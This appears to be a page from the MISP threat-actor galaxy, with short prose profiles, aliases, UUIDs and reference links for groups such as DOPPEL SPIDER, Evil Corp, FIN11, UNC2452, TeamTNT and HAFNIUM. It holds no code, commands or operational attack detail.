ANTHROPOID SPIDER
Publicly known as 'EmpireMonkey', ANTHROPOID SPIDER conducted phishing campaigns in February and March 2019, spoofing French, Norwegian and Belizean financial regulators and institutions. These campaigns used macro-enabled Microsoft documents to deliver the PowerShell Empire post-exploitation framework. ANTHROPOID SPIDER likely enabled a breach that allegedly involved fraudulent transfers over the SWIFT network.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ANTHROPOID SPIDER.
Known Synonyms |
---|
CobaltGoblin |
Empire Monkey |
Internal MISP references
UUID 559a64d8-8657-4a93-9208-060d52efdec4
which can be used as unique global reference for ANTHROPOID SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest - webarchive
- https://fortiguard.com/encyclopedia/botnet/7630456 - webarchive
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Finance'] |
CLOCKWORK SPIDER
Opportunistic actor that installs a custom root certificate on victim systems to support man-in-the-middle network monitoring.
Internal MISP references
UUID 2d2f3b53-c544-4823-a65f-da53ff8f594e
which can be used as unique global reference for CLOCKWORK SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
DOPPEL SPIDER
In June 2019, CrowdStrike Intelligence observed a source code fork of BitPaymer and began tracking the new ransomware strain as DoppelPaymer. Further technical analysis revealed an increasing divergence between two versions of Dridex, with the new version dubbed DoppelDridex. Based on this evidence, CrowdStrike Intelligence assessed with high confidence that a new group split off from INDRIK SPIDER to form the adversary DOPPEL SPIDER. Following DOPPEL SPIDER’s inception, CrowdStrike Intelligence observed multiple BGH incidents attributed to the group, with the largest known ransomware demand being 250 BTC. Other demands were not nearly as high, suggesting that the group conducts network reconnaissance to determine the value of the victim organization.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DOPPEL SPIDER.
Known Synonyms |
---|
GOLD HERON |
Internal MISP references
UUID 2154b183-c5c5-418f-8e47-f6e999b64e30
which can be used as unique global reference for DOPPEL SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
MONTY SPIDER
Spambots continued to decline in 2019, with MONTY SPIDER’s CraP2P spambot falling silent in April.
Internal MISP references
UUID 168a9e38-70e3-4542-b78f-afa2414436bb
which can be used as unique global reference for MONTY SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
NARWHAL SPIDER
NARWHAL SPIDER’s operation of Cutwail v2 was limited to country-specific spam campaigns, although late in 2019 there appeared to be an effort to expand by bringing in INDRIK SPIDER as a customer.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NARWHAL SPIDER.
Known Synonyms |
---|
GOLD ESSEX |
TA544 |
Internal MISP references
UUID fda9cdea-0017-495e-879d-0f348db2aa07
which can be used as unique global reference for NARWHAL SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-essex - webarchive
- https://www.proofpoint.com/us/threat-insight/post/brushaloader-still-sweeping-victims-one-year-later - webarchive
- https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much - webarchive
- https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0 - webarchive
- https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes - webarchive
Associated metadata
Metadata key | Value |
---|---|
NOCTURNAL SPIDER
Mentioned as MaaS operator in CrowdStrike's 2020 Report.
Internal MISP references
UUID c042c592-25f6-4887-8a1b-6b8e3bfdcf0c
which can be used as unique global reference for NOCTURNAL SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SCULLY SPIDER
Mentioned as operator of DanaBot in CrowdStrike's 2020 Report.
Internal MISP references
UUID 7fb1662e-0257-4606-b3a2-bf294c64c098
which can be used as unique global reference for SCULLY SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SMOKY SPIDER
Mentioned as operator of SmokeLoader in CrowdStrike's 2020 Report.
Internal MISP references
UUID e27796eb-624a-4e41-aa40-52d47c764b07
which can be used as unique global reference for SMOKY SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
VENOM SPIDER
VENOM SPIDER is the developer of a large toolset that includes SKID, VenomKit and Taurus Loader. Under the moniker 'badbullzvenom', the adversary has been an active member of Russian underground forums since at least 2012, specializing in the identification of vulnerabilities and the subsequent development of tools for exploitation, as well as for gaining and maintaining access to victim machines and carding services. Recent advertisements for the malware indicate that VENOM SPIDER limits the sale and use of its tools, selling modules only to trusted affiliates. This preference can be seen in the fact that adversaries observed using the tools include the targeted criminal adversary COBALT SPIDER and BGH adversaries WIZARD SPIDER and PINCHY SPIDER.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular VENOM SPIDER.
Known Synonyms |
---|
badbullz |
badbullzvenom |
Internal MISP references
UUID 86b4e2f3-8bbf-48fd-9d27-034d3ac3b187
which can be used as unique global reference for VENOM SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Operation Shadow Force
Operation Shadow Force is the name for a cluster of activity, represented by the Shadow Force and Wgdrop malware from 2013 to 2020, that attacks Korean companies and organizations. The group's first confirmed attack was in March 2013, but judging by the malware creation dates it is likely to have been active before 2012. Because the malware used mainly by the group is Shadow Force, the activity was named Operation Shadow Force; it has not been confirmed whether the attacker is associated with a known group.
Internal MISP references
UUID f628b544-48b6-44e2-b794-950713353cf1
which can be used as unique global reference for Operation Shadow Force
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
NOTROBIN
Researchers at FireEye report finding a hacking group (dubbed NOTROBIN) that has been bundling mitigation code for NetScaler servers with its exploits. In effect, the hackers exploit the flaw to get access to the server, kill any existing malware, set up their own backdoor, and then apply a mitigation that blocks the vulnerable code path against future exploitation attempts.
Internal MISP references
UUID 21d08f2c-97b2-444e-be49-8457093b841a
which can be used as unique global reference for NOTROBIN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
ItaDuke
ItaDuke is an actor known since 2013. It used PDF exploits to drop malware and Twitter accounts to store C2 server URLs. In 2018, an actor named DarkUniverse, which was active between 2009 and 2017, was attributed to ItaDuke by Kaspersky.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ItaDuke.
Known Synonyms |
---|
DarkUniverse |
SIG27 |
Internal MISP references
UUID d0b900fa-84b4-11ea-bc55-0242ac130003
which can be used as unique global reference for ItaDuke
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Nazar
This actor was identified by Juan Andres Guerrero-Saade from the SIG37 cluster as published in the ShadowBrokers' 'Lost in Translation' leak. Earliest known sighting potentially dates back to as far as 2008 with a confirmed center of activity around 2010-2013. The actor name is derived from a PDB debug string fragment: 'khzer'. Victimology indicates targeting of Iran, assessed with low confidence based on VT file submission locations. Nazar employs a modular toolkit where a main dropper silently registers multiple DLLs as OLE controls in the Windows registry. Functionality includes keylogging, sound and screen grabbing, as well as traffic capture using the MicroOlap Packet Sniffer library.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nazar.
Known Synonyms |
---|
SIG37 |
Internal MISP references
UUID 169187c5-9fbe-42df-ae92-6e35846db021
which can be used as unique global reference for Nazar
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Higaisa
The group often uses dates that are significant in North Korea, such as holidays, as lures for its phishing activities. The bait includes New Year greetings, Lantern Festival greetings, North Korean celebrations, important news, contact lists of overseas personnel, and so on. The group also has the capability to attack mobile devices. Its targets include diplomatic entities related to North Korea (such as embassy officials in various places), government officials, human rights organizations, North Korean residents abroad, and traders. Victim countries observed so far include China, North Korea, Japan, Nepal, Singapore, Russia, Poland, Switzerland, etc.
Internal MISP references
UUID a9df6cb7-74ff-482f-b23b-ac40e975a31a
which can be used as unique global reference for Higaisa
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-state-sponsor | Korea (Republic of) |
cfr-suspected-victims | ['China', 'North Korea', 'Japan', 'Nepal', 'Singapore', 'Russia', 'Poland', 'Switzerland'] |
cfr-target-category | ['Government'] |
country | KR |
COBALT JUNO
COBALT JUNO has operated since at least 2013 and has focused on targets located in the Middle East, including Iran, Jordan, Egypt and Lebanon. COBALT JUNO's custom spyware families SABER1 and SABER2 include surveillance functionality and masquerade as legitimate software utilities such as Adobe Updater, StickyNote and ASKDownloader. CTU researchers assess with moderate confidence that COBALT JUNO has operated the ZooPark Android spyware since at least mid-2015. ZooPark was publicly exposed in 2018 in both vendor reporting and a high-profile leak of C2 server data. COBALT JUNO is linked to a private security company in Iran and outsources aspects of tool development work to commercial software developers. CTU researchers have observed the group using strategic web compromises to deliver malware. CTU researchers' discovery of new C2 domains in 2019 suggests the group is still actively performing operations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular COBALT JUNO.
Known Synonyms |
---|
APT-C-38 (QiAnXin) |
SABER LION |
TG-2884 (SCWX CTU) |
Internal MISP references
UUID 4687e1ab-a361-4165-b142-00845f4b2c62
which can be used as unique global reference for COBALT JUNO
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
COBALT KATANA
COBALT KATANA has been active since at least March 2018, and it focuses many of its operations on organizations based in or associated with Kuwait. The group has targeted government, logistics, and shipping organizations. The threat actors gain initial access to targets using DNS hijacking, strategic web compromise with SMB forced authentication, and password brute force attacks. COBALT KATANA operates a custom platform referred to as the Sakabota Framework, also referred to as Sakabota Core, with a complementary set of modular backdoors and accessory tools including Gon, Hisoka, Hisoka Netero, Killua, Diezen, and Eye. The group has implemented DNS tunnelling in its malware and malicious scripts and also operates the HyphenShell web shell to strengthen post-intrusion access. CTU researchers assess with moderate confidence that COBALT KATANA operates on behalf of Iran, and elements of its operations such as overlapping infrastructure, use of DNS hijacking, implementation of DNS-based C2 channels in malware and web shell security mechanisms suggest connections to COBALT GYPSY and COBALT EDGEWATER.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular COBALT KATANA.
Known Synonyms |
---|
Hive0081 (IBM) |
Hunter Serpens |
SectorD01 (NHSC) |
xHunt campaign (Palo Alto) |
Internal MISP references
UUID d1c25b0e-e4c5-4b7c-b790-2e185cb2f07e
which can be used as unique global reference for COBALT KATANA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Dark Basin
Dark Basin is a hack-for-hire group that has targeted thousands of individuals and hundreds of institutions on six continents. Targets include advocacy groups and journalists, elected and senior government officials, hedge funds, and multiple industries. Dark Basin extensively targeted American nonprofits, including organisations working on a campaign called #ExxonKnew, which asserted that ExxonMobil hid information about climate change for decades. We also identify Dark Basin as the group behind the phishing of organizations working on net neutrality advocacy, previously reported by the Electronic Frontier Foundation. We link Dark Basin with high confidence to an Indian company, BellTroX InfoTech Services, and related entities.
Internal MISP references
UUID 3cbc52d5-fe4d-4d7a-a5e9-641b7c073d62
which can be used as unique global reference for Dark Basin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GALLIUM
GALLIUM is a threat actor believed to target telecommunications providers around the world, mostly in South-East Asia, Europe and Africa. To compromise targeted networks, GALLIUM targets unpatched internet-facing services using publicly available exploits and has been known to target vulnerabilities in WildFly/JBoss.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GALLIUM.
Known Synonyms |
---|
Alloy Taurus |
Granite Typhoon |
Red Dev 4 |
Internal MISP references
UUID e400b6c5-77cf-453d-ba0f-44575583ac6c
which can be used as unique global reference for GALLIUM
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - webarchive
- https://www.youtube.com/watch?v=fBFm2fiEPTg - webarchive
- https://troopers.de/troopers22/talks/7cv8pz/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/alloytaurus/ - webarchive
- https://unit42.paloaltonetworks.com/alloy-taurus-targets-se-asian-government/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Evilnum
ESET has analyzed the operations of Evilnum, the APT group behind the Evilnum malware previously seen in attacks against financial technology companies. While said malware has been seen in the wild since at least 2018 and documented previously, little has been published about the group behind it and how it operates. The group’s targets remain fintech companies, but its toolset and infrastructure have evolved and now consist of a mix of custom, homemade malware combined with tools purchased from Golden Chickens, a Malware-as-a-Service (MaaS) provider whose infamous customers include FIN6 and Cobalt Group.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Evilnum.
Known Synonyms |
---|
DeathStalker |
EvilNum |
Jointworm |
KNOCKOUT SPIDER |
TA4563 |
Internal MISP references
UUID b6f3150f-2240-4c57-9dda-5144c5077058
which can be used as unique global reference for Evilnum
in MISP communities and other software using the MISP galaxy
External references
- https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ - webarchive
- https://securelist.com/deathstalker-mercenary-triumvirate/98177/ - webarchive
- https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/buy-sell-steal-evilnum-targets-cryptocurrency-forex-commodities - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-evilnum-apt-group-active-iocs-7 - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-evilnum-apt-group-targeting-financial-sector - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.hivepro.com/wp-content/uploads/2022/08/Vulnerabilities-Threats-that-Matter-25th-to-31st-July.pdf - webarchive
- https://medium.com/bitso-engineering/profiling-disrupting-an-apt-spear-phishing-campaign-targeting-slack-users-in-the-financial-sector-9389533d5fc2 - webarchive
Associated metadata
Metadata key | Value |
---|---|
Fox Kitten
PIONEER KITTEN is an Iran-based adversary that has been active since at least 2017 and has a suspected nexus to the Iranian government. This adversary appears to be primarily focused on gaining and maintaining access to entities possessing sensitive information of likely intelligence interest to the Iranian government. According to DRAGOS, they also targeted ICS-related entities using known VPN vulnerabilities. They are widely known to use open source penetration testing tools for reconnaissance and to establish encrypted communications.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Fox Kitten.
Known Synonyms |
---|
Lemon Sandstorm |
PARISITE |
PIONEER KITTEN |
RUBIDIUM |
UNC757 |
Internal MISP references
UUID bfb0bc20-5bdf-47ff-b07f-dbd9a3cb9772
which can be used as unique global reference for Fox Kitten
in MISP communities and other software using the MISP galaxy
External references
- https://youtu.be/pBDu8EGWRC4?t=2492 - webarchive
- https://www.dragos.com/threat/parisite - webarchive
- https://www.dragos.com/wp-content/uploads/The-ICS-Threat-Landscape.pdf - webarchive
- https://www.dragos.com/wp-content/uploads/NA-EL-Threat-Perspective-2019.pdf - webarchive
- https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf - webarchive
- https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices - webarchive
- https://www.crowdstrike.com/blog/who-is-pioneer-kitten - webarchive
- https://www.zdnet.com/article/iranian-hackers-are-selling-access-to-compromised-companies-on-an-underground-forum - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-259a - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
XDSpy
Rare is the APT group that goes largely undetected for nine years, but XDSpy is just that: a previously undocumented espionage group that has been active since 2011. It has attracted very little public attention, with the exception of an advisory from the Belarusian CERT in February 2020. In the interim, the group has compromised many government agencies and private companies in Eastern Europe and the Balkans.
Internal MISP references
UUID b205584e-db93-433a-b97a-7f2e19d8c188
which can be used as unique global reference for XDSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Government, Administration'] |
Evil Corp
Evil Corp is an international cybercrime network. In December 2019 the US Federal Government offered a $5M bounty for information leading to the arrest and conviction of Maksim V. Yakubets for allegedly orchestrating Evil Corp operations. The group is responsible for stealing over $100M from businesses and consumers. The Evil Corp organization is known for utilizing custom strains of malware such as JabberZeus, Bugat and Dridex to steal banking credentials.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Evil Corp.
Known Synonyms |
---|
GOLD DRAKE |
Internal MISP references
UUID c30fbdc8-b66d-4242-a02a-e01946bc86d8
which can be used as unique global reference for Evil Corp
in MISP communities and other software using the MISP galaxy
External references
- https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/ - webarchive
- https://en.wikipedia.org/wiki/Maksim_Yakubets - webarchive
- https://www.bbc.com/news/world-us-canada-53195749 - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-drake - webarchive
- https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation - webarchive
Associated metadata
Metadata key | Value |
---|---|
TRACER KITTEN
In April 2020, CrowdStrike Falcon OverWatch discovered the Iran-based adversary TRACER KITTEN conducting malicious interactive activity against multiple hosts at a telecommunications company in the Europe, Middle East and Africa (EMEA) region. The actor was found operating under valid user accounts, using custom backdoors in combination with SSH tunnels for C2. The adversary leveraged their foothold to conduct a variety of reconnaissance activities, undertake credential harvesting and prepare for data exfiltration.
Internal MISP references
UUID 6cc574c0-3dfa-459c-933a-4c63490c4e93
which can be used as unique global reference for TRACER KITTEN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
targeted-sector | ['Telecoms'] |
FIN11
FIN11 is a well-established financial crime group that has recently focused its operations on ransomware and extortion. The group has been active since 2017 and has been tracked under UNC902 and later as TEMP.Warlock. In some ways, FIN11 is reminiscent of APT1; they are notable not for their sophistication, but for their sheer volume of activity (FireEye). Mandiant has also responded to numerous FIN11 intrusions, but we've only observed the group successfully monetize access in a few instances. This could suggest that the actors cast a wide net during their phishing operations, then choose which victims to further exploit based on characteristics such as sector, geolocation or perceived security posture. Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands. The group's shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—are part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion. Notably, FIN11 includes a subset of the activity security researchers call TA505, Graceful Spider and Gold Evergreen, but we do not attribute TA505's early operations to FIN11 and caution against using the names interchangeably. Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors' use of criminal service providers. Like most financially motivated actors, FIN11 doesn't operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware. Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FIN11.
Known Synonyms |
---|
TEMP.Warlock |
UNC902 |
Internal MISP references
UUID c01aadc6-1087-4e8e-8d5c-a27eba409fe3
which can be used as unique global reference for FIN11
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html - webarchive
- https://www.fireeye.com/blog/threat-research/2020/10/fin11-email-campaigns-precursor-for-ransomware-data-theft.html - webarchive
- https://www.brighttalk.com/webcast/7451/447347 - webarchive
Associated metadata
Metadata key | Value |
---|---|
UNC1878
UNC1878 is a financially motivated threat actor that monetizes network access via the deployment of RYUK ransomware. Earlier this year, Mandiant published a blog on a fast-moving adversary deploying RYUK ransomware, UNC1878. Shortly after its release, there was a significant decrease in observed UNC1878 intrusions and RYUK activity overall almost completely vanishing over the summer. But beginning in early fall, Mandiant has seen a resurgence of RYUK along with TTP overlaps indicating that UNC1878 has returned from the grave and resumed their operations.
Internal MISP references
UUID 3c2bb7d7-a085-4594-adc7-4a20cf724abb
which can be used as unique global reference for UNC1878
in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/anthomsec/status/1321865315513520128 - webarchive
- https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html - webarchive
- https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456 - webarchive
- https://www.youtube.com/watch?v=CgDtm05qApE - webarchive
- https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
Red Charon
Throughout 2019, multiple companies in the Taiwan high-tech ecosystem were victims of an advanced persistent threat (APT) attack. Because these APT attacks shared similar behavior profiles (similar adversarial tactics, techniques, and procedures, or TTPs) with each other and with previously documented cyberattacks, CyCraft assesses with high confidence that these new attacks were conducted by the same foreign threat actor. During their investigation, they dubbed this threat actor Chimera. “Chimera” stands for the synthesis of hacker tools that they have seen the group use, such as the skeleton key malware that contained code extracted from both Dumpert and Mimikatz — hence Chimera. Their operation — the entirety of the new attacks utilizing the Skeleton Key attack (described below) from late 2018 to late 2019 — CyCraft has dubbed Operation Skeleton Key.
Internal MISP references
UUID c8b961fe-3698-41ac-aba1-002ee3c19531
which can be used as unique global reference for Red Charon
in MISP communities and other software using the MISP galaxy
External references
- https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf - webarchive
- https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/ - webarchive
- https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf - webarchive
- https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730 - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
UNC2452
Reporting regarding activity related to the SolarWinds supply chain injection has grown quickly since initial disclosure on 13 December 2020. A significant amount of press reporting has focused on the identification of the actor(s) involved, victim organizations, possible campaign timeline, and potential impact. The US Government and cyber community have also provided detailed information on how the campaign was likely conducted and some of the malware used. MITRE’s ATT&CK team — with the assistance of contributors — has been mapping techniques used by the actor group, referred to as UNC2452/Dark Halo by FireEye and Volexity respectively, as well as SUNBURST and TEARDROP malware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UNC2452.
Known Synonyms |
---|
DarkHalo |
Midnight Blizzard |
NOBELIUM |
Solar Phoenix |
StellarParticle |
Internal MISP references
UUID 2ee5ed7a-c4d0-40be-a837-20817474a15b
which can be used as unique global reference for UNC2452
in MISP communities and other software using the MISP galaxy
External references
- https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714 - webarchive
- https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html - webarchive
- https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/ - webarchive
- https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/ - webarchive
- https://pastebin.com/6EDgCKxd - webarchive
- https://github.com/fireeye/sunburst_countermeasures - webarchive
- https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware - webarchive
- https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html - webarchive
- https://unit42.paloaltonetworks.com/atoms/solarphoenix/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2024/01/25/midnight-blizzard-guidance-for-responders-on-nation-state-attack/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-social-engineering-over-microsoft-teams/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 100 |
country | RU |
Related clusters
TeamTNT
In early February 2021, TeamTNT launched a new campaign against Docker and Kubernetes environments. Using a collection of container images hosted on Docker Hub, the attackers target misconfigured Docker daemons, Kubeflow dashboards, and Weave Scope, exploiting these environments in order to steal cloud credentials, open backdoors, mine cryptocurrency, and launch a worm that looks for the next victim. They are linked to the first crypto-mining worm to steal AWS credentials and to the Hildegard cryptojacking malware. TeamTNT is a relatively recent addition to a growing number of threats targeting the cloud. While they employ some of the same tactics as similar groups, TeamTNT stands out with their social media presence and penchant for self-promotion. Tweets from TeamTNT's account are in both English and German, although it is unknown whether they are located in Germany.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TeamTNT.
Known Synonyms |
---|
Adept Libra |
Internal MISP references
UUID 27de6a09-844b-4dcb-9ff9-7292aad826ba
which can be used as unique global reference for TeamTNT
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ - webarchive
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt - webarchive
- https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment - webarchive
- https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool - webarchive
- https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html - webarchive
- https://cyware.com/news/hildegard-teamtnts-new-feature-rich-malware-targeting-kubernetes-6587eb45 - webarchive
- https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/adept-libra/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
HAFNIUM
HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures. HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they've gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA. In campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets' environments. HAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HAFNIUM.
Known Synonyms |
---|
ATK233 |
G0125 |
Operation Exchange Marauder |
Red Dev 13 |
Silk Typhoon |
Internal MISP references
UUID 4f05d6c1-3fc1-4567-91cd-dd4637cc38b5
which can be used as unique global reference for HAFNIUM
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/groups/G0125/ - webarchive
- https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers - webarchive
- https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ - webarchive
- https://www.splunk.com/en_us/blog/security/detecting-hafnium-exchange-server-zero-day-activity-in-splunk.html - webarchive
- https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers - webarchive
- https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day - webarchive
- https://twitter.com/ESETresearch/status/1366862946488451088 - webarchive
- https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-062a - webarchive
- https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289 - webarchive
- https://github.com/microsoft/CSS-Exchange/tree/main/Security - webarchive
- https://github.com/cert-lv/exchange_webshell_detection - webarchive
- https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits - webarchive
- https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021 - webarchive
- https://pastebin.com/J4L3r2RS - webarchive
- https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers - webarchive
- https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Execution/exchange-iis-worker-dropping-webshell.md - webarchive
- https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server - webarchive
- https://www.nextron-systems.com/2021/03/06/scan-for-hafnium-exploitation-evidence-with-thor-lite - webarchive
- https://www.thedailybeast.com/how-chinas-devastating-microsoft-hack-puts-us-all-at-risk - webarchive
- https://www.rnz.co.nz/news/political/447239/government-points-finger-at-china-over-cyber-attacks - webarchive
- https://www.gov.uk/government/news/uk-and-allies-hold-chinese-state-responsible-for-a-pervasive-pattern-of-hacking - webarchive
- https://www.foreignminister.gov.au/minister/marise-payne/media-release/australia-joins-international-partners-attribution-malicious-cyber-activity-china - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi - webarchive
